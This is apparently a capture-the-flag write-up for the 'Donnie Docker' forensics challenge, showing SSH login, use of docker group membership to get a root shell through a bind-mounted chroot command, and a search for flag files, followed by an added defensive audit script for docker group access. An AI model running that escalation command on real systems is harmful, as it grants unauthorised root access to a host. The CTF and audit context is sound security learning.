Posted on April 18, 2021

Donnie Docker | Forensics


From the CTF description we got credentials for the SSH connection:

ssh user@chals2.umdctf.io -p 5000
password: umdctf

After logging in with the given credentials, I saw a Docker machine.
First I checked where I was (the pwd command) and which groups I belong to (the id command).

uid=1000(user) gid=1000(user) groups=1000(user),999(docker)

I saw that I belong to the docker group, so I followed this lead. I assumed that if I am in this group I can probably use docker commands. From previous CTFs I knew a cool website where I found how to get a root shell with the privileges to run docker:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Running the command above gave me a root account with access to everything inside the Docker container. Now I had to find the file with the flag:

find / -name "*.txt" 2>/dev/null

This command listed all files with the .txt extension, which gave me some garbage and three flag.txt files:

/var/lib/docker/vfs/dir/c53fadd9c7a3f33d711b573de585b367e45d6a4de64e677ab8ffc1bf6112fbff/flag.txt
/var/lib/docker/vfs/dir/c53fadd9c7a3f33d711b573de585b367e45d6a4de64e677ab8ffc1bf6112fbff-init/flag.txt
/var/lib/docker/vfs/dir/9a2432327f4d149162a06da63a797e0b88a8c2bccac598f262ebb6d073b9ecda/flag.txt
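As an added example (not code from this write-up), here is a small POSIX shell audit a defender can run to see who on a host has the same docker-group path to root that the steps above used. It assumes the usual /etc/group and /var/run/docker.sock locations; the sample group file is constructed for the self-check.

```shell
#!/bin/sh
# Added audit helper, not part of the original write-up. Docker group
# membership is root-equivalent (the chroot trick above shows why), so
# list who has it and whether the daemon socket is reachable.

# Constructed sample standing in for /etc/group.
SAMPLE_GROUP='root:x:0:
docker:x:999:user,deploy
user:x:1000:
sudo:x:27:admin'

# Print the members of the docker group, one per line, from /etc/group-style
# text passed as $1. No output means no account is in the group.
docker_group_members() {
    printf '%s\n' "$1" | awk -F: '
        $1 == "docker" && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) print m[i]
        }'
}

# Return 0 if an `id` output line (like the one in the write-up) shows the
# docker group, 1 otherwise.
id_line_in_docker_group() {
    printf '%s\n' "$1" | grep -Eq '(^|[=,])[0-9]+\(docker\)'
}

# Live check against the real host. Path assumptions: /etc/group and
# /var/run/docker.sock (defaults on most Linux installs).
audit_docker_access() {
    group_file="${1:-/etc/group}"
    sock="${2:-/var/run/docker.sock}"
    if [ -r "$group_file" ]; then
        members=$(docker_group_members "$(cat "$group_file")" | tr '\n' ' ')
        if [ -n "$members" ]; then
            echo "docker group members (root-equivalent): $members"
        fi
    fi
    if [ -S "$sock" ] && [ -w "$sock" ]; then
        echo "WARNING: $sock is writable by $(id -un); this user is root-equivalent"
    fi
}

# Mitigation for any hit: remove the account from the docker group or move
# to rootless Docker; there is no safe way to keep membership non-privileged.
audit_docker_access
```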

CC BY 4.0 WaletSec + HuntClauss